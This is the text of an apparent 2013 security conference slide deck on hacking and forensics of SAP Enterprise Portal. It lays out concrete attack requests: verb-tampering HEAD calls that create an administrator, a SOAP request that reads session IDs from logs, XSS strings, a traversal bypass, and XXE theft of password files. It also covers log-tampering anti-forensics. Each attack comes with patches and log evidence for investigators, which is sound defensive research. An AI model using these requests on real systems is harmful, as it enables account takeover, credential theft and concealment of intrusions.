Invest in security
to secure investments
SAP Portal: Hacking and forensics
Dmitry Chastukhin Director of SAP pentest/research team
Evgeny Neyolov Security analyst, (anti)forensics research
�ERPScan
Developing software for SAP security monitoring
Talks at 35+ security conferences worldwide: BlackHat
(US/EU/DC/UAE), RSA, Defcon, CONFidence, HITB, etc.
First to develop software for NetWeaver J2EE assessment
The only solution to assess all areas of SAP Security
Research team with experience in different areas of security
from ERP and web security to mobile, embedded devices, and
critical infrastructure, accumulating their knowledge on SAP
research.
Leading SAP AG partner in the field of discovering security
vulnerabilities by the number of found vulnerabilities
erpscan.com
ERPScan invest in security to secure investments
�Dmitry Chastukhin
Yet another security
researcher
Business application security
expert
erpscan.com
ERPScan invest in security to secure investments
�Agenda
SAP security
SAP forensics WTF?!
Say hello to SAP Portal
Breaking SAP Portal
Catch me if you can
Conclusion
erpscan.com
ERPScan invest in security to secure investments
�SAP
The most popular business application
More than 180000 customers worldwide
More than 70% of Forbes 500 run SAP
More than 40% of ERP market in Poland
erpscan.com
ERPScan invest in security to secure investments
�SAP security
Espionage
Stealing financial information
Stealing corporate secrets
Stealing supplier and customer lists
Stealing HR data
Fraud
False transactions
Modification of master data
Sabotage
Denial of service
Modification of financial reports
Access to technology network (SCADA) by trust relations
erpscan.com
ERPScan invest in security to secure investments
�SAP security
35
30
25
20
15
10
BlackHat
Defcon
HITB
RSA
CONFidence
DeepSec
Hacktivity
Troopers
Source
2003
2004
2005
2006
2007
2008
2009
2010
2011
2012
2013
Source: SAP Security in Figures 2013
LINK
erpscan.com
ERPScan invest in security to secure investments
�How easy? SAP Security Notes
More than 2600 in total
erpscan.com
ERPScan invest in security to secure investments
�Is it remotely exploitable?
sapscan.com
> 5000 non-web SAP services exposed in the world
including Dispatcher, Message server, SapHostControl, etc.
erpscan.com
ERPScan invest in security to secure investments
�What about other services?
9
World
8
SAP Dispatcher
erpscan.com
SAP MMC
SAP Message Server
SAP HostControl
SAP ITS Agate
ERPScan invest in security to secure investments
SAP Message Server
httpd
10
�What about unpublished threats?
Companies are not interested in publishing information about
their breaches
There are a lot of internal breaches thanks to unnecessarily
given authorizations (An employee by mistake buys hundreds of
excavators instead of ten)
There are known stories about backdoors left by developers in
custom ABAP code
How can you be sure that, if a breach occurs, you can find
evidence?
erpscan.com
ERPScan invest in security to secure investments
11
�SAP Forensics
If there are no attacks, it doesnt mean anything
Companies dont like to share it
Companies dont use security audit ~10%
Even if used, nobody manages it ~5%
Even if managed, no correlation ~1%
erpscan.com
ERPScan invest in security to secure investments
12
�Typical SAP audit options
ICM log icm/HTTP/logging_0
Security audit log in ABAP
Table access logging rec/client
Message Server log ms/audit
SAP Gateway access log
70%
10%
4%
2%
2%
* The percentage of companies is based on our security assessments and product
implementations.
erpscan.com
ERPScan invest in security to secure investments
13
�What do we see?
A lot of research
Real attacks
Lack of logging practice
Many vulnerabilities are hard to close We need to monitor
them, at least
erpscan.com
ERPScan invest in security to secure investments
14
�What do we need to monitor?
External attacks on SAP
* Ideally, we should control everything, but this talk has limits, so lets focus on
the most critical areas.
Attack users and SAP GUI
Awareness
SAProuter
Secure configuration and patch management
Exposed SAP services
Disable them
SAP Portal and WEB
Too much issues and custom
configuration
Can be 0-days
Need to concentrate on this area
erpscan.com
ERPScan invest in security to secure investments
15
�Say hello to Portal
Point of web access
to SAP systems
Point of web access to
other corporate systems
Way for attackers
to get access to SAP
from the Internet
erpscan.com
ERPScan invest in security to secure investments
16
�EP architecture
erpscan.com
ERPScan invest in security to secure investments
17
�Okay, okay. SAP Portal is important, and
it has many links to other modules.
So what?
erpscan.com
ERPScan invest in security to secure investments
18
�SAP Logging
If you are running an ABAP + Java installation of Web AS with
SAP Web Dispatcher as a load balancing solution, you can safely
disable logging of HTTP requests and responses on J2EE Engine,
and use the corresponding CLF logs of SAP Web Dispatcher. This
also improves the HTTP communication performance. The only
drawback of using the Web Dispatchers CLF logs is that no
information is available about the user executing the request
(since the user is not authenticated on the Web Dispatcher, but
on the J2EE Engine instead).
SOURCE: SAP HELP
*Not the only. There are many complex attacks with POST requests.
erpscan.com
ERPScan invest in security to secure investments
19
�SAP J2EE Logging
Categories of system events recording:
System all system related security and administrative logs
Applications all system events related to business logic
Performance reserved for single activity tracing
Default location of these files in your file system:
\usr\sap\<sid>\<id>\j2ee\cluster\<node>\log\
erpscan.com
ERPScan invest in security to secure investments
20
�SAP J2EE Logging
The developer trace files of the Java instance
<SID>\<instance name>\work
The developer trace files of the central services
<SID>\<instance name>\work
<SID>\<instance name>\log
Java server logs
<SID>\<instance name>\j2ee\cluster\server<n>\log
erpscan.com
ERPScan invest in security to secure investments
21
�Full logging is not always the best option
erpscan.com
ERPScan invest in security to secure investments
22
�SAP Management Console
erpscan.com
ERPScan invest in security to secure investments
23
�SAP Management Console
SAP MMC: centralized system management
SAP MMC has remote commands
Commands are simple SOAP requests
Allowing to see the trace and log messages
Its not bad if you only use it sometimes and delete logs after
use, but
erpscan.com
ERPScan invest in security to secure investments
24
�SAP Management Console
What can we find in logs?
Right!
The file userinterface.log contains calculated JSESIONID
But
The attacker must have credentials to read the log file
WRONG!
erpscan.com
ERPScan invest in security to secure investments
25
�SAP Management Console
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xs="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Header>
<sapsess:Session
xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/">
<enableSession>true</enableSession>
</sapsess:Session>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns1:ReadLogFile xmlns:ns1="urn:SAPControl">
<filename>j2ee/cluster/server0/log/system/userinterface.log</filename>
<filter/>
<language/>
<maxentries>%COUNT%</maxentries>
<statecookie>EOF</statecookie>
</ns1:ReadLogFile>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
erpscan.com
ERPScan invest in security to secure investments
26
�Prevention
Dont use TRACE_LEVEL = 3
Delete traces when work is finished
Limit access to dangerous methods
Install notes 927637 and 1439348
Mask security-sensitive data in HTTP access log
LINK to SAP HELP
erpscan.com
ERPScan invest in security to secure investments
27
�Prevention
The HTTP Provider service can mask securitysensitive URL parameters, cookies, or headers
By default, only for the headers listed below
Path Parameter: jsessionid
Request Parameters: j_password, j_username,
j_sap_password, j_sap_again, oldPassword,
confirmNewPassword,ticket
HTTP Headers: Authorization, Cookie (JSESSIONID,
MYSAPSSO2)
LINK to SAP HELP
erpscan.com
ERPScan invest in security to secure investments
28
�SAP NetWeaver J2EE
erpscan.com
ERPScan invest in security to secure investments
29
�Access Control
Declarative
Programmatic
By WEB.XML
By UME
Web Dynpro
Portal iViews
J2EE Web apps
erpscan.com
- programmatic
- programmatic
- declarative
ERPScan invest in security to secure investments
30
�Access Control
The central entity in the J2EE authorization model is the security
role
Programmers define the application-specific roles in the J2EE
deployment descriptor
web.xml
erpscan.com
web-j2ee-engine.xml
ERPScan invest in security to secure investments
31
�web.xml
<servlet>
<servlet-name>CriticalAction</servlet-name>
<servlet-class>com.sap.admin.Critical.Action</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>CriticalAction</</servlet-name>
<url-pattern>/admin/critical</url-pattern>
</servlet-mapping
<security-constraint>
<web-resource-collection>
<web-resource-name>Restrictedaccess</web-resource-name>
<url-pattern>/admin/*</url-pattern>
<http-method>GET</http-method>
</web-resource-collection>
<auth-constraint>
<role-name>administrator</role-name>
</auth-constraint>
</security-constraint>
Verb Tampering
erpscan.com
ERPScan invest in security to secure investments
32
�Verb Tampering
If we are trying to get access to an application using GET we
need a login:pass and administrator role
What if we try to get access to application using HEAD instead
GET?
PROFIT!
Did U know about ctc?
erpscan.com
ERPScan invest in security to secure investments
33
�Verb Tampering
Need Admin account in SAP Portal?
Just send two HEAD requests
Create new user CONF:idence
HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;
CREATEUSER;USERNAME=CONF,PASSWORD=idence
Add the user CONF to the group Administrators
HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;
ADD_USER_TO_GROUP;USERNAME=CONF,GROUPNAME=Administrators
* Works when UME uses JAVA database.
erpscan.com
ERPScan invest in security to secure investments
34
�Prevention
Install SAP notes 1503579, 1616259, 1589525,
1624450
Install other SAP notes about Verb Tampering
Scan applications with ERPScan WEB.XML
checker
Disable the applications that are not necessary
erpscan.com
ERPScan invest in security to secure investments
35
�Investigation
[Apr 3, 2013 1:23:59 AM
] - 192.168.192.14
: GET /ctc/ConfigServlet HTTP/1.1 401 1790
[Apr 3, 2013 1:30:01 AM
] - 192.168.192.14
: HEAD /ctc/ConfigServlet HTTP/1.1 200 0
[Apr 3, 2013 1:30:01 AM
] - 192.168.192.14
: HEAD
/ctc/ConfigServlet?param=com.sap.ctc.util.Use
rConfig;CREATEUSER;USERNAME=CONF,PASSWORD=ide
nce HTTP/1.0 200 0
j2ee\cluster\<node>\log\system\httpaccess\responses.trc
erpscan.com
ERPScan invest in security to secure investments
36
�web.xml
<servlet>
<servlet-name>CriticalAction</servlet-name>
<servlet-class>com.sap.admin.Critical.Action</servletclass>
</servlet>
GET /admin/critical/CriticalAction
<servlet-mapping>
<servlet-name>CriticalAction</</servlet-name>
<url-pattern>/admin/critical</url-pattern>
</servlet-mapping
<security-constraint>
GET /servlet/com.sap.admin.Critical.Action
<web-resource-collection>
<web-resource-name>Restrictedaccess</web-resource-name>
<url-pattern>/admin/*</url-pattern>
<http-method>GET</http-method>
<http-method>HEAD</http-method>
</web-resource-collection>
<auth-constraint>
<role-name>administrator</role-name>
</auth-constraint>
Invoker servlet
</security-constraint>
erpscan.com
ERPScan invest in security to secure investments
37
�Invoker Servlet
Want to execute an OS command on J2EE server remotely?
Maybe upload a backdoor in a Java class?
Or sniff all traffic?
Still remember ctc?
erpscan.com
ERPScan invest in security to secure investments
38
�Invoker Servlet
erpscan.com
ERPScan invest in security to secure investments
39
�Prevention
Update to the latest patch 1467771, 1445998
EnableInvokerServletGlobally must be false
Check all WEB.XML files with ERPScan WEBXML
checker
erpscan.com
ERPScan invest in security to secure investments
40
�Investigation
#1.5#000C29C2603300790000003A000008700004D974E7CCC6D8#13649960352
03#/System/Security/Audit#sap.com/tc~lm~ctc~util~basic_ear#com.sa
p.security.core.util.SecurityAudit#Guest#0#SAP J2EE Engine JTA
Transaction :
[024423a006e18]#n/a##217c5d309c6311e29bca000c29c26033#SAPEngine_A
pplication_Thread[impl:3]_22##0#0#Info#1#com.sap.security.core.ut
il.SecurityAudit#Plain###Guest
| USER.CREATE |
USER.PRIVATE_DATASOURCE.un:CONF
|
| SET_ATTRIBUTE:
uniquename=[CONF]#
#1.5#000C29C2603300680002C97A000008700004D974E8354D1D#13649960420
62#/System/Security/Audit/J2EE#sap.com/irj#com.sap.engine.service
s.security.roles.audit#Guest#182818##n/a##0c5bfef08bc511e287e6000
c29c26033#Thread[Thread50,5,SAPEngine_Application_Thread[impl:3]_Group]##0#0#Info#1#com.
sap.engine.services.security.roles.audit#Java###{0}:
Authorization check for caller assignment to J2EE security role
[{1} : {2}].#3#ACCESS.OK#SAP-J2EE-Engine#guests#
erpscan.com
ERPScan invest in security to secure investments
41
�Investigation
erpscan.com
ERPScan invest in security to secure investments
41
�XSS
Many XSSs in Portal
But sometimes HttpOnly
But when we exploit XSS, we can use the features of SAP Portal
EPCF
erpscan.com
ERPScan invest in security to secure investments
43
�EPCF
EPCF provides a JavaScript API designed for the client-side
communication between portal components and the portal core
framework
Enterprise Portal Client Manager (EPCM)
iViews can access the EPCM object from every portal page
or IFrame
Every iView contains the EPCM object
<SCRIPT>
alert(EPCM.loadClientData("urn:com.sap.myObjects", "person");
</SCRIPT>
For example, EPCF used for transient user data buffer for iViews
erpscan.com
ERPScan invest in security to secure investments
44
�Prevention
Install SAP note 1656549
erpscan.com
ERPScan invest in security to secure investments
45
�Investigation
#Plain###192.168.192.26 : GET
/irj/servlet/prt/portal/prtroot/com.sap.porta
l.usermanagement.admin.UserMapping?systemid=M
S_EXCHANGEaaaa%3C/script%3E%3Cscript%3Ealert(
%27xSS%27)%3C/script%3E HTTP/1.1 200 3968#
j2ee\cluster\<node>\log\system\httpaccess\res
ponses.trc
erpscan.com
ERPScan invest in security to secure investments
46
�Web Dynpro JAVA
Web Dynpro unauthorized modifications
For example:
somebody steals an account using XSS/CSRF/Sniffing
then tries to modify the severity level of logs
erpscan.com
ERPScan invest in security to secure investments
47
�Web Dynpro JAVA
LINK to SAP HELP
erpscan.com
ERPScan invest in security to secure investments
48
�Investigation
No traces of change in default log files
\cluster\server0\log\system\httpaccess\responses.log
Web Dynpro sends all data by POST, and we only see GET URLs in
responses.log
But sometimes we can find information by indirect signs
[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET
/webdynpro/resources/sap.com/tc~lm~webadmin~log_config
~wd/Components/com.sap.tc.log_configurator.LogConfigur
ator/warning.gif HTTP/1.1 200 110
The client loaded images from the server during some changes
erpscan.com
ERPScan invest in security to secure investments
49
�Investigation
Most actions have icons
They have to be loaded from the server
Usually, legitimate users have them all in cache
Attackers usually dont have them, so they make requests to the
server
Thats how we can identify potentially malicious actions
But there should be correlation with a real users activity
False positives are possible:
New legitimate user
Old user clears cache
Other
erpscan.com
ERPScan invest in security to secure investments
50
�Directory traversal
FIX
erpscan.com
ERPScan invest in security to secure investments
51
�Directory traversal fix bypass
erpscan.com
ERPScan invest in security to secure investments
52
�Prevention
Install SAP note 1630293
erpscan.com
ERPScan invest in security to secure investments
53
�Investigation
/../
!252f..!252f
erpscan.com
ERPScan invest in security to secure investments
54
�Breaking SAP Portal
Found a file in the OS of SAP Portal with the encrypted
passwords for administration and DB
Found a file in the OS of SAP Portal with keys to decrypt
passwords
Found a vulnerability (another one ;)) which allows reading the
files with passwords and keys
Decrypt passwords and log into Portal
PROFIT!
erpscan.com
ERPScan invest in security to secure investments
55
�Read the file
How can we read the file?
Directory Traversal
OS Command execution
XML External Entity (XXE)
erpscan.com
ERPScan invest in security to secure investments
56
�XXE in Portal: Details
Injection of malicious requests into XML packets
Can lead to unauthorized file read, DoS, SSRF
There is an XXE vulnerability in SAP Portal
Can be exploited by modification of POST request
It is possible to read any file from OS and much more
erpscan.com
ERPScan invest in security to secure investments
57
�XXE in Portal
erpscan.com
ERPScan invest in security to secure investments
58
�XXE in Portal
erpscan.com
ERPScan invest in security to secure investments
59
�XXE
Error based XXE
erpscan.com
ERPScan invest in security to secure investments
60
�XXE in Portal: Result
We can read any file
Including config with passwords
The SAP J2EE Engine stores the database user SAP<SID>DB; its
password is here:
\usr\sap\<SID>\SYS\global\security\data\SecStore.properties
erpscan.com
ERPScan invest in security to secure investments
61
�Where are the passwords?
(config.properties)
rdbms.maximum_connections=5
system.name=TTT
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/
data/SecStore.key
secstorefs.secfile=/oracle/TTT/sapmnt/global/security/
data/SecStore.properties
secstorefs.lib=/oracle/TTTsapmnt/global/security/lib
rdbms.driverLocation=/oracle/client/10x_64/instantclie
nt/ojdbc14.jar
rdbms.connection=jdbc/pool/TTT
rdbms.initial_connections=1
erpscan.com
ERPScan invest in security to secure investments
62
�Where are the passwords?
(config.properties)
rdbms.maximum_connections=5
system.name=TTT
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/
data/SecStore.key
secstorefs.secfile=/oracle/TTT/sapmnt/global/security/
data/SecStore.properties
secstorefs.lib=/oracle/TTTsapmnt/global/security/lib
rdbms.driverLocation=/oracle/client/10x_64/instantclie
nt/ojdbc14.jar
rdbms.connection=jdbc/pool/TTT
rdbms.initial_connections=1
erpscan.com
ERPScan invest in security to secure investments
63
�SecStore.properties
$internal/version=Ni4zFF4wMSeaseforCCMxegAfx
admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwu
eur2445yxgBS
admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgq
Dp+QD04b0Fh
jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI
0VGegH
admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr
4ZUgRTQ
$internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt
$internal/mode=encrypted
admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV7
5eC6/5S3E
But where is the key?
erpscan.com
ERPScan invest in security to secure investments
64
�config.properties
rdbms.maximum_connections=5
system.name=TTT
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/
data/SecStore.key
secstorefs.secfile=/oracle/TTT/sapmnt/global/security/
data/SecStore.properties
secstorefs.lib=/oracle/TTTsapmnt/global/security/lib
rdbms.driverLocation=/oracle/client/10x_64/instantclie
nt/ojdbc14.jar
rdbms.connection=jdbc/pool/TTT
rdbms.initial_connections=1
erpscan.com
ERPScan invest in security to secure investments
65
�Get the password
We have an encrypted password
We have a key to decrypt it
We got the J2EE admin and JDBC
login:password!
erpscan.com
ERPScan invest in security to secure investments
66
�Prevention
Install SAP note 1619539
Restrict read access to files SecStore.properties
and SecStore.key
erpscan.com
ERPScan invest in security to secure investments
67
�Investigation
POST
/irj/servlet/prt/portal/prteventname/HtmlbE
vent/prtroot/pcd!3aportal_content!2fadminis
trator!2fsuper_admin!2fsuper_admin_role!2fc
om.sap.portal.content_administration!2fcom.
sap.portal.content_admin_ws!2fcom.sap.km.Ad
minContent!2fcom.sap.km.AdminContentExplore
r!2fcom.sap.km.AdminExplorer/ HTTP/1.1
erpscan.com
ERPScan invest in security to secure investments
68
�Investigation
The only one way to get HTTP POST request values is to enable
HTTP Trace
Visual Administrator Dispatcher HTTP Provider
Properties: HttpTrace = enable
For 6.4 and 7.0 SP12 and lower:
On Dispatcher:
/j2ee/cluster/dispatcher/log/defaultTrace.trc
On Server
\j2ee\cluster\server0\log\system\httpaccess\responses.0.trc
For 7.0 SP13 and higher:
/j2ee/cluster/dispatcher/log/services/http/req_resp.trc
Manually analyze all requests for XXE attacks
erpscan.com
ERPScan invest in security to secure investments
69
�Malicious file upload: Attack
Knowledge management allows uploading to the server
different types of files that can store malicious content
Sometimes, if guest access is allowed, it is possible to upload
any file without being an authenticated user
For example, it can be an HTML file with JavaScript that steals
cookies
erpscan.com
ERPScan invest in security to secure investments
70
�Malicious file upload: Attack
erpscan.com
ERPScan invest in security to secure investments
71
�Malicious file upload: Attack
erpscan.com
ERPScan invest in security to secure investments
72
�Malicious file upload: Forensics
[Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST
/irj/servlet/prt/portal/prteventname/HtmlbEvent/prt
root/pcd!3aportal_content!2fspecialist!2fcontentman
ager!2fContentManager!2fcom.sap.km.ContentManager!2
fcom.sap.km.ContentExplorer!2fcom.sap.km.ContentDoc
Explorer!2fcom.sap.km.DocsExplorer/documents
HTTP/1.1 200 13968
[Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET
/irj/go/km/docs/etc/public/mimes/images/html.gif
HTTP/1.1 200 165
*Again, images can help us.
erpscan.com
ERPScan invest in security to secure investments
73
�Malicious file upload: Prevention
Enable File Extension and Size Filter:
System Administration System Configuration
Content Management Repository Filters Show
Advanced Options File Extension and Size Filter
Select either the All repositories parameter or at least
one repository from the repository list in
the Repositories parameter
erpscan.com
ERPScan invest in security to secure investments
74
�Malicious file upload: Prevention
Enable Malicious Script Filter:
System Administration System Configuration
Content Management Repository Filters Show
Advanced Options Malicious Script Filter
The filter also detects executable scripts in files that are
being modified and encodes them when they are saved
enable Forbidden Scripts. Comma-separated list of banned
script tags that will be encoded when the filter is applied
enable the Send E-Mail to Administrator option
erpscan.com
ERPScan invest in security to secure investments
75
�Portal post-exploitation
Lot of links to other systems in corporate LAN
Using SSRF, attackers can get access to these systems
What is
erpscan.com
SSRF?
ERPScan invest in security to secure investments
76
�SSRF History: Basics
We send Packet A to Service A
Service A initiates Packet B to service B
Services can be on the same or different hosts
We can manipulate some fields of packet B within packet A
Various SSRF attacks depend on how many fields we can control
on packet B
Packet A
Packet B
erpscan.com
ERPScan invest in security to secure investments
77
�Partial Remote SSRF:
HTTP attacks on other services
HTTP Server
Corporate
network
Direct attack
GET /vuln.jsp
SSRF Attack
Get /vuln.jst
SSRF Attack
erpscan.com
ERPScan invest in security to secure investments
78
�Gopher uri scheme
Using gopher:// uri scheme, it is possible to send TCP
packets
Exploit OS vulnerabilities
Exploit old SAP application vulnerabilities
Bypass SAP security restrictions
Exploit vulnerabilities in local services
More info in our BH2012 presentation:
SSRF vs. Business Critical Applications
LINK
erpscan.com
ERPScan invest in security to secure investments
79
�Portal post-exploitation
erpscan.com
ERPScan invest in security to secure investments
80
�Anti-forensics
erpscan.com
ERPScan invest in security to secure investments
81
�Anti-forensics
Flooding
Deleting
Changing
erpscan.com
ERPScan invest in security to secure investments
82
�Anti-forensics
Log flooding
5 active logs
Maximum log file size is 10 Mb
Archiving when all logs reach the maximum size
If file.0.log -> max size then open file.1.log
If file.4.log -> max size then zip all and backup
Rewriting the same files after archiving
erpscan.com
ERPScan invest in security to secure investments
83
�Anti-forensics
Log deleting
SAP locks write access to the only one active log
SAP allows reading/writing logs, so it is possible to delete them
It could compromise the attackers presence
Log changing
SAP locks write access only to the one active log
It is possible to write into any other log file
erpscan.com
ERPScan invest in security to secure investments
84
�Securing SAP Portal
Patching
Secure configuration
Enabling HTTP Trace with masking
Malicious script filter
Log archiving
Additional place for log storage
Monitoring of security events
Own scripts, parse common patterns
ERPScan has all existing web vulns/0-day patterns
erpscan.com
ERPScan invest in security to secure investments
85
�Conclusion
It is possible to protect yourself from these kinds of issues,
and we are working close with SAP to keep customers secure
SAP Guides
Regular security assessments
Monitoring technical security
ABAP code review
Segregation of Duties
Security events monitoring
Its all in your hands
�Future work
I'd like to thank SAP's Product Security Response Team for the
great cooperation to make SAP systems more secure. Research
is always ongoing, and we can't share all of it today. If you want
to be the first to see new attacks and demos, follow us at
@erpscan and attend future presentations:
July 31 BlackHat (Las Vegas, USA)
erpscan.com
ERPScan invest in security to secure investments
87
�Web:
www.erpscan.com
e-mail: [email protected]
Twitter:
@erpscan
@_chipik
@neyolov
